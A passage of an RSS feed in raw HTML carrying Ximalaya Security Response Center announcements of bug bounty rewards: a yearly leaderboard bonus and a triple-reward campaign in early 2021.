data-backh="618" data-backw="578" data-galleryid="" data-ratio="1.0688705234159779" data-s="300,640" style="width: 100%;height: auto;" data-type="png" data-w="726" src="https://wechat2rss.xlab.app/img-proxy/?k=0525b1cb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicc2C7QDZyggc7YjQ7hxLZUicWZADCN2udv3Lq9ccpicSsMkFFXdAIialhruTmFGq45cfa0LzJGDMGfw%2F640%3Fwx_fmt%3Dpng"/></section><p style="font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);white-space: normal;text-align: center;"><span style="font-size: 17px;font-family: DengXian;">XMSRC</span><span style="font-size: 17px;font-family: DengXian;">将为以上白帽子颁发奖励～</span></p><p style="font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);white-space: normal;text-align: center;"><span style="font-size: 17px;font-family: DengXian;">感谢所有白帽子对喜马拉雅安全的关注与支持！</span></p><p style="font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);white-space: normal;text-align: center;"><span style="font-size: 17px;font-family: DengXian;"><br/></span></p><p style="font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);white-space: normal;text-align: center;"><span style="font-size: 17px;font-family: DengXian;">2022</span><span style="font-size: 17px;font-family: DengXian;">年，让我们继续携手同行，保卫喜马安全～</span></p><p style="font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);white-space: normal;text-align: center;"><span style="font-size: 17px;font-family: DengXian;">期待优秀的你们都能登上喜马榜单！</span></p><p style="text-align: center;"><br/></p><p style="font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);white-space: normal;text-align: center;"><span style="font-size: 17px;font-family: DengXian;"></span><br/></p><p style="font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);white-space: normal;text-align: center;"><span style="font-size: 17px;font-family: DengXian;">附录：<br/></span></p><section style="font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);white-space: normal;text-align: center;margin-bottom: 20px;"><span style="font-size: 17px;font-family: DengXian;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247483723&amp;idx=1&amp;sn=289b6eac8384cc2921541e5c0e6ba082&amp;chksm=eb1a4c6bdc6dc57d1dee6c84c77618c0b7bcee99f40d78d2989e1ea13c70282cb0c3916dd690&amp;scene=21#wechat_redirect" textvalue="喜马拉雅SRC年度奖励计划&amp;新年三倍活动" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2">喜马拉雅SRC年度奖励计划&amp;新年三倍活动</a><br/></span></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="1" data-s="300,640" style="width: 174px;height: 174px;" data-type="jpeg" data-w="430" src="https://wechat2rss.xlab.app/img-proxy/?k=9c935dfe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ibibRvIkR8VrCGWVlX7UFAu6QzicjQNLYclpqRF1eIFR0tFswUtSXtbFYKp8LicjKNU2NQIzdiaGyw6dOw%2F640%3Fwx_fmt%3Djpeg"/></p><p style="font-size: 16px;font-family: 宋体;color: rgb(0, 0, 0);white-space: normal;text-align: center;"><span style="font-size: 12px;">欢迎扫码关注～</span></p>



<p><a href="2247483758">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=2860c618&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247483758%26idx%3D1%26sn%3D2b5a4285c530158eef2638c0391b3154%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 24 Jan 2022 15:00:00 +0800</pubDate>
    </item>
    <item>
      <title>喜马拉雅SRC年度奖励计划&amp;新年三倍活动</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247483723&amp;idx=1&amp;sn=289b6eac8384cc2921541e5c0e6ba082</link>
      <description>年度奖励计划&amp;新年三倍活动</description>
      <content:encoded><![CDATA[<p>
<span>XMSRC</span> <span>2021-01-20 10:49</span> <span style="display: inline-block;"></span>
</p>

<p>年度奖励计划&新年三倍活动</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=e8a3a852&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ibibRvIkR8VrCGWVlX7UFAu6QGzqXjdB78MJgFbIhmZ8XdRZYtZewES23icEtoeZicWyd0gD2r5GGmQyg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="font-size: 13px;letter-spacing: 1px;line-height: 2;box-sizing: border-box;"><section style="text-align: left;margin-right: 0%;margin-left: 0%;justify-content: flex-start;box-sizing: border-box;" powered-by="xiumi.us"><section style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 60%;height: auto;box-sizing: border-box;"><img data-ratio="0.5172413793103449" style="vertical-align: middle;width: 100%;height: 100%;box-sizing: border-box;" data-type="svg" data-w="290" src="https://wechat2rss.xlab.app/img-proxy/?k=fa9c9602&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_svg%2FOibRNdtlJdkEicv76OPbMfOGZlyCSXD2NR7iawiaFp7EauKzl6myBKKRU50qw0dM7k6ic6IzZUXwzVSB27JfUDsZ5ng63DVT9zH2R%2F640%3Fwx_fmt%3Dsvg"/></section></section><section style="margin: -80px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 85%;border-width: 2px;border-style: solid;border-color: rgb(95, 156, 239);padding: 10px;box-shadow: rgb(95, 156, 239) 9px 7px 0px;height: auto;border-radius: 0px;background-position: 0% 0%;background-repeat: repeat-y;background-size: 100%;background-attachment: scroll;background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_jpg/bNibSwNU98ibibRvIkR8VrCGWVlX7UFAu6Qjek7YoCKQY1EXnlbswKt2ENeh4NJib0656JxlvZQztiaHhw8lB8s6HHg/640?wx_fmt=jpeg&#34;);box-sizing: border-box;"><section style="margin: 10px 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="letter-spacing: 3px;line-height: 1.1;font-size: 30px;color: rgb(255, 255, 255);text-shadow: rgb(99, 87, 163) 1px 1px, rgb(99, 87, 163) 1px -1px, rgb(99, 87, 163) -1px 1px, rgb(99, 87, 163) -1px -1px, rgb(99, 87, 163) 0px 1.4px, rgb(99, 87, 163) 0px -1.4px, rgb(99, 87, 163) -1.4px 0px, rgb(99, 87, 163) 1.4px 0px, rgb(99, 87, 163) 2px 2px, rgb(99, 87, 163) 3px 3px, rgb(99, 87, 163) 3px 1px, rgb(99, 87, 163) 1px 3px, rgb(99, 87, 163) 1px 1px, rgb(99, 87, 163) 2px 3.4px, rgb(99, 87, 163) 2px 0.6px, rgb(99, 87, 163) 0.6px 2px, rgb(99, 87, 163) 3.4px 2px;box-sizing: border-box;"><p style="box-sizing: border-box;">SRC年度奖励计划</p><p style="box-sizing: border-box;">&amp;</p><p style="box-sizing: border-box;">新年三倍活动</p></section></section></section></section><section style="text-align: right;margin: -55px 0% 10px;justify-content: flex-end;box-sizing: border-box;" powered-by="xiumi.us"><section style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 30%;height: auto;box-sizing: border-box;"><img data-ratio="0.855" style="vertical-align: middle;width: 100%;box-sizing: border-box;" data-type="gif" data-w="400" src="https://wechat2rss.xlab.app/img-proxy/?k=c5e58542&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FbNibSwNU98ibibRvIkR8VrCGWVlX7UFAu6QxwGnFcUHQHrYeZWRev7wEu9lTkgsJDF5qMrquHfegbxAia7QuVlcicRg%2F640%3Fwx_fmt%3Dgif"/></section></section><section style="margin: -25px 0% -5px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;padding-right: 6px;padding-left: 6px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="margin: 15px 0% 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;background-color: rgb(255, 255, 255);border-width: 0px;box-sizing: border-box;"><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="margin: 15px 0% 5px;display: flex;flex-flow: row nowrap;box-sizing: border-box;"><section style="display: inline-block;vertical-align: middle;width: 27px;flex: 0 0 auto;height: auto;align-self: center;line-height: 0;box-sizing: border-box;"><section style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: right;justify-content: flex-end;transform: translate3d(-5px, 0px, 0px) rotateX(180deg);margin-right: 0%;margin-left: 0%;box-sizing: border-box;"><section style="display: inline-block;width: 10px;height: 10px;vertical-align: top;overflow: hidden;border-width: 0px;border-radius: 10px;border-style: none;border-color: rgb(62, 62, 62);background-color: rgb(95, 156, 239);box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;border-width: 0px;margin-right: 17px;box-sizing: border-box;"><section style="margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="background-color: rgb(95, 156, 239);height: 1px;box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section></section><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: flex;flex-flow: row nowrap;margin-right: 0%;margin-bottom: 20px;margin-left: 0%;box-sizing: border-box;"><section style="display: inline-block;width: auto;vertical-align: top;border-style: none solid solid;border-width: 1px;border-radius: 0px;border-color: rgba(95, 156, 239, 0.79) rgb(95, 156, 239) rgb(95, 156, 239);flex: 100 100 0%;align-self: flex-start;height: auto;margin-right: 17px;margin-left: 17px;background-color: rgb(247, 250, 255);box-sizing: border-box;"><section style="margin: 10px 0% 20px;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: center;color: rgb(62, 62, 62);padding-right: 23px;padding-left: 23px;line-height: 1.8;box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="font-size: 15px;">过去的一年，</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;">XMSRC收到了数百个有效漏洞，</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;">感谢各位白帽子的支持与厚爱。</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;">感谢大家在2020年</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;">为喜马拉雅安全做出的每一份付出与努力！</span></p></section></section></section></section></section></section></section></section></section><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: flex;flex-flow: row nowrap;margin: 10px 0%;box-sizing: border-box;"><section style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;align-self: center;height: auto;box-sizing: border-box;"><section style="margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="background-color: rgb(95, 156, 239);height: 1px;box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 88px;align-self: center;flex: 0 0 auto;background-color: rgb(221, 231, 248);height: auto;margin-right: -20px;margin-left: -20px;box-sizing: border-box;"><section style="text-align: center;font-size: 0px;margin: 4px 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 4px;height: 4px;vertical-align: top;overflow: hidden;background-color: rgb(95, 156, 239);border-width: 0px;border-radius: 50%;border-style: none;border-color: rgb(62, 62, 62);box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><section style="margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="background-color: rgb(95, 156, 239);height: 1px;box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section></section><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: flex;flex-flow: row nowrap;text-align: center;justify-content: center;margin: 20px 0% 10px;box-sizing: border-box;"><section style="display: inline-block;vertical-align: bottom;width: auto;flex: 0 0 0%;align-self: flex-end;height: auto;line-height: 0.5;border-width: 0px;box-sizing: border-box;"><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 20px;height: 24px;vertical-align: top;overflow: hidden;border-style: solid none solid solid;border-width: 1px;border-radius: 8px 0px 0px 8px;border-color: rgb(95, 156, 239) rgb(62, 62, 62) rgb(95, 156, 239) rgb(95, 156, 239);box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;flex: 0 0 auto;align-self: flex-end;min-width: 10%;max-width: 100%;height: auto;border-bottom: 1px solid rgb(95, 156, 239);border-bottom-right-radius: 0px;padding-right: 5px;padding-bottom: 5px;padding-left: 5px;box-sizing: border-box;"><section style="margin-right: 0%;margin-bottom: 3px;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="background-color: rgba(55, 113, 187, 0.22);height: 1px;box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;width: 100%;vertical-align: top;background-color: rgb(221, 231, 248);padding-right: 10px;padding-left: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="font-size: 20px;color: rgb(62, 62, 62);box-sizing: border-box;"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">01 SRC年度奖励计划</strong></p></section></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;flex: 0 0 0%;align-self: flex-end;height: auto;line-height: 0.5;box-sizing: border-box;"><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 20px;height: 24px;vertical-align: top;overflow: hidden;border-style: solid solid solid none;border-width: 1px;border-radius: 0px 8px 8px 0px;border-color: rgb(95, 156, 239) rgb(95, 156, 239) rgb(95, 156, 239) rgb(55, 113, 187);box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section></section><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><p style="box-sizing: border-box;"><span style="font-size: 15px;">为了更好的回馈白帽子对我们的支持和付出，</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;">喜马拉雅安全应急响应中心奖励升级，</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;">自2021年1月起，</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;">增设年终奖励计划。</span></p></section><section style="box-sizing: border-box;" powered-by="xiumi.us"><p style="text-align: center;white-space: normal;box-sizing: border-box;"><br style="box-sizing: border-box;"/></p><p style="text-align: center;white-space: normal;box-sizing: border-box;"><span style="font-size: 15px;">新的一年，</span></p><p style="text-align: center;white-space: normal;box-sizing: border-box;"><span style="font-size: 15px;">喜马拉雅SRC将在你们的陪伴下继续成长，</span></p><p style="text-align: center;white-space: normal;box-sizing: border-box;"><span style="font-size: 15px;">在这里祝愿大家在新的一年都</span></p><p style="text-align: center;white-space: normal;box-sizing: border-box;"><span style="box-sizing: border-box;font-size: 17px;"><strong style="box-sizing: border-box;"><span style="font-size: 17px;color: rgb(95, 156, 239);box-sizing: border-box;">牛转乾坤，属你最牛！</span></strong></span></p></section><section style="margin: 30px 0% 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: solid;border-width: 2px;border-radius: 10px;border-color: rgb(95, 156, 239);padding-right: 10px;padding-bottom: 10px;padding-left: 10px;overflow: hidden;box-sizing: border-box;"><section style="margin-right: 0%;margin-bottom: 10px;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: none solid solid;border-width: 1px;border-radius: 0px;border-color: rgb(95, 156, 239);padding-right: 4px;padding-bottom: 4px;padding-left: 4px;box-sizing: border-box;"><section style="display: inline-block;width: 100%;vertical-align: top;border-width: 0px;background-color: rgb(221, 231, 248);padding: 3px 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: center;color: rgb(62, 62, 62);letter-spacing: 3px;font-size: 16px;box-sizing: border-box;" powered-by="xiumi.us"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">年/终/奖/励/规/则</strong></p></section></section></section></section><section style="text-align: center;color: rgb(106, 106, 106);box-sizing: border-box;" powered-by="xiumi.us"><p style="box-sizing: border-box;"><span style="font-size: 15px;">年度榜单第一 5000元</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;">年度榜单第二 2000元</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;">年度榜单第三至第五 1000元</span></p></section></section></section><section style="margin: 10px 0% 30px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;border-width: 0px 0px 0px 4px;border-radius: 0px 10px 10px 0px;border-style: none none none solid;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(62, 62, 62) rgb(95, 156, 239);background-color: rgb(247, 250, 255);padding: 15px 20px;box-sizing: border-box;"><section style="color: rgb(62, 62, 62);line-height: 1.8;box-sizing: border-box;" powered-by="xiumi.us"><p style="white-space: normal;box-sizing: border-box;"><span style="box-sizing: border-box;font-size: 15px;"><strong style="box-sizing: border-box;">注意：</strong></span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 15px;">1、年排行榜中，贡献值 &gt;= 50</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 15px;">2、若贡献值大于50的不足5人，则从上而下开始分配</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 15px;">例如：两人满足条件，则第一人获得5000，第二人获得2000，剩余空置。</span></p><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 15px;">3、年终计划于2021.1开始执行。</span></p></section></section></section><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: flex;flex-flow: row nowrap;margin: 50px 0% 10px;box-sizing: border-box;"><section style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;align-self: center;height: auto;box-sizing: border-box;"><section style="margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="background-color: rgb(95, 156, 239);height: 1px;box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 88px;align-self: center;flex: 0 0 auto;background-color: rgb(221, 231, 248);height: auto;margin-right: -20px;margin-left: -20px;box-sizing: border-box;"><section style="text-align: center;font-size: 0px;margin: 4px 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 4px;height: 4px;vertical-align: top;overflow: hidden;background-color: rgb(95, 156, 239);border-width: 0px;border-radius: 50%;border-style: none;border-color: rgb(62, 62, 62);box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><section style="margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="background-color: rgb(95, 156, 239);height: 1px;box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section></section><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: flex;flex-flow: row nowrap;text-align: center;justify-content: center;margin: 20px 0% 10px;box-sizing: border-box;"><section style="display: inline-block;vertical-align: bottom;width: auto;flex: 0 0 0%;align-self: flex-end;height: auto;line-height: 0.5;border-width: 0px;box-sizing: border-box;"><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 20px;height: 24px;vertical-align: top;overflow: hidden;border-style: solid none solid solid;border-width: 1px;border-radius: 8px 0px 0px 8px;border-color: rgb(95, 156, 239) rgb(62, 62, 62) rgb(95, 156, 239) rgb(95, 156, 239);box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;flex: 0 0 auto;align-self: flex-end;min-width: 10%;max-width: 100%;height: auto;border-bottom: 1px solid rgb(95, 156, 239);border-bottom-right-radius: 0px;padding-right: 5px;padding-bottom: 5px;padding-left: 5px;box-sizing: border-box;"><section style="margin-right: 0%;margin-bottom: 3px;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="background-color: rgba(55, 113, 187, 0.22);height: 1px;box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section><section style="display: inline-block;width: 100%;vertical-align: top;background-color: rgb(221, 231, 248);padding-right: 10px;padding-left: 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="font-size: 20px;color: rgb(62, 62, 62);box-sizing: border-box;"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">02 新年三倍活动</strong></p></section></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;flex: 0 0 0%;align-self: flex-end;height: auto;line-height: 0.5;box-sizing: border-box;"><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 20px;height: 24px;vertical-align: top;overflow: hidden;border-style: solid solid solid none;border-width: 1px;border-radius: 0px 8px 8px 0px;border-color: rgb(95, 156, 239) rgb(95, 156, 239) rgb(95, 156, 239) rgb(55, 113, 187);box-sizing: border-box;"><section><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section></section><section style="box-sizing: border-box;" powered-by="xiumi.us"><p style="white-space: normal;box-sizing: border-box;"><br style="box-sizing: border-box;"/></p></section><section style="text-align: center;box-sizing: border-box;" powered-by="xiumi.us"><p style="box-sizing: border-box;"><span style="font-size: 15px;">与此同时，</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;">新年年货也给大家安排上。</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;"><span style="color: rgb(95, 156, 239);box-sizing: border-box;"><strong style="box-sizing: border-box;">2021年1月21日</strong></span>起至<strong style="box-sizing: border-box;"><span style="color: rgb(95, 156, 239);box-sizing: border-box;">2021年2月5日18点</span></strong>，</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;">最高<span style="color: rgb(95, 156, 239);box-sizing: border-box;"><strong style="box-sizing: border-box;">3倍</strong></span>漏洞奖励，</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;">喜马拉雅SRC</span></p><p style="box-sizing: border-box;"><span style="font-size: 15px;">陪你共度小年，迎接新年。</span></p></section><section style="margin: 30px 0% 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: solid;border-width: 2px;border-radius: 10px;border-color: rgb(95, 156, 239);padding-right: 10px;padding-bottom: 10px;padding-left: 10px;overflow: hidden;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="margin-right: 0%;margin-bottom: 30px;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: none solid solid;border-width: 1px;border-radius: 0px;border-color: rgb(95, 156, 239);padding-right: 4px;padding-bottom: 4px;padding-left: 4px;box-sizing: border-box;"><section style="display: inline-block;width: 100%;vertical-align: top;border-width: 0px;background-color: rgb(221, 231, 248);padding: 3px 10px;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: center;color: rgb(62, 62, 62);letter-spacing: 3px;font-size: 16px;box-sizing: border-box;" powered-by="xiumi.us"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">新/年/活/动/须/知</strong></p></section></section></section></section><section style="margin: 10px 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: none none solid solid;border-width: 1px;border-radius: 0px;border-color: rgb(0, 175, 236);box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: flex;flex-flow: row nowrap;box-sizing: border-box;"><section style="display: inline-block;vertical-align: middle;width: auto;flex: 10 10 0%;height: auto;border-style: solid solid none none;border-width: 1px;border-radius: 0px;border-color: rgb(95, 156, 239) rgb(95, 156, 239) rgb(0, 175, 236) rgb(0, 175, 236);padding-top: 4px;padding-right: 4px;padding-bottom: 4px;background-color: rgba(255, 255, 255, 0);box-shadow: rgb(255, 255, 255) 0px 0px 0px inset;align-self: center;box-sizing: border-box;"><section style="display: inline-block;width: 100%;vertical-align: top;background-color: rgb(221, 231, 248);padding: 3px;box-sizing: border-box;" powered-by="xiumi.us"><section style="margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: center;font-size: 16px;color: rgb(106, 106, 106);line-height: 1.2;box-sizing: border-box;"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">01</strong></p></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;padding-right: 10px;padding-left: 10px;flex: 100 100 0%;align-self: center;border-width: 0px;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;background-color: rgba(255, 255, 255, 0);box-sizing: border-box;"><section style="margin-top: 5px;margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="color: rgb(62, 62, 62);box-sizing: border-box;"><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 16px;"><strong style="box-sizing: border-box;">活动时间</strong></span></p></section></section></section></section></section></section></section><section style="margin-right: 0%;margin-bottom: 30px;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: left;color: rgb(62, 62, 62);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="font-size: 15px;">2021.1.21 - 2021.2.5 18:00</span></p></section></section><section style="margin: 10px 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: none none solid solid;border-width: 1px;border-radius: 0px;border-color: rgb(0, 175, 236);box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: flex;flex-flow: row nowrap;box-sizing: border-box;"><section style="display: inline-block;vertical-align: middle;width: auto;flex: 10 10 0%;height: auto;border-style: solid solid none none;border-width: 1px;border-radius: 0px;border-color: rgb(95, 156, 239) rgb(95, 156, 239) rgb(0, 175, 236) rgb(0, 175, 236);padding-top: 4px;padding-right: 4px;padding-bottom: 4px;background-color: rgba(255, 255, 255, 0);box-shadow: rgb(255, 255, 255) 0px 0px 0px inset;align-self: center;box-sizing: border-box;"><section style="display: inline-block;width: 100%;vertical-align: top;background-color: rgb(221, 231, 248);padding: 3px;box-sizing: border-box;" powered-by="xiumi.us"><section style="margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="text-align: center;font-size: 16px;color: rgb(106, 106, 106);line-height: 1.2;box-sizing: border-box;"><p style="box-sizing: border-box;"><strong style="box-sizing: border-box;">02</strong></p></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: auto;padding-right: 10px;padding-left: 10px;flex: 100 100 0%;align-self: center;border-width: 0px;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;background-color: rgba(255, 255, 255, 0);box-sizing: border-box;"><section style="margin-top: 5px;margin-right: 0%;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="color: rgb(62, 62, 62);box-sizing: border-box;"><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 16px;"><strong style="box-sizing: border-box;">活动范围</strong></span></p></section></section></section></section></section></section></section><section style="margin-right: 0%;margin-bottom: 30px;margin-left: 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="color: rgb(62, 62, 62);box-sizing: border-box;"><p style="white-space: normal;box-sizing: border-box;"><span style="font-size: 15px;">参见《喜马拉雅SRC漏洞处理规则及评分标准v2.1》</span></p></section></section><section style="margin: 10px 0%;box-sizing: border-box;" powered-by="xiumi.us"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: none none solid solid;border-width: 1px;border-radius: 0px;border-color: rgb(0, 175, 236) rgb(0, 175, 236) rgb(95, 156, 239) rgb(95, 156, 239);box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="box-sizing: border-box;" powered-by="xiumi.us"><section style="display: flex;flex-flow: row nowrap;box-sizing: border-box;"><section style="display: inline-block;vertical-align: middle;width: auto;flex: 10 10 0%;height: auto;border-style: solid solid none none;border-width: 1px;border-radius: 0px;border-color: rgb(95, 156, 239) rgb(95, 156, 239) rgb(0, 175, 236) rgb(0, 175, 236);padding-top: 4px;padding-right: 4px;padding-bottom: 4px;background-color: rgba(255, 255, 255, 0);box-shadow: rgb(255, 255, 255) 0px 0px 0px inset;align-self: center;box-sizing: border-box;"><section style="display: inline-block;width: 100%;vertical-align: 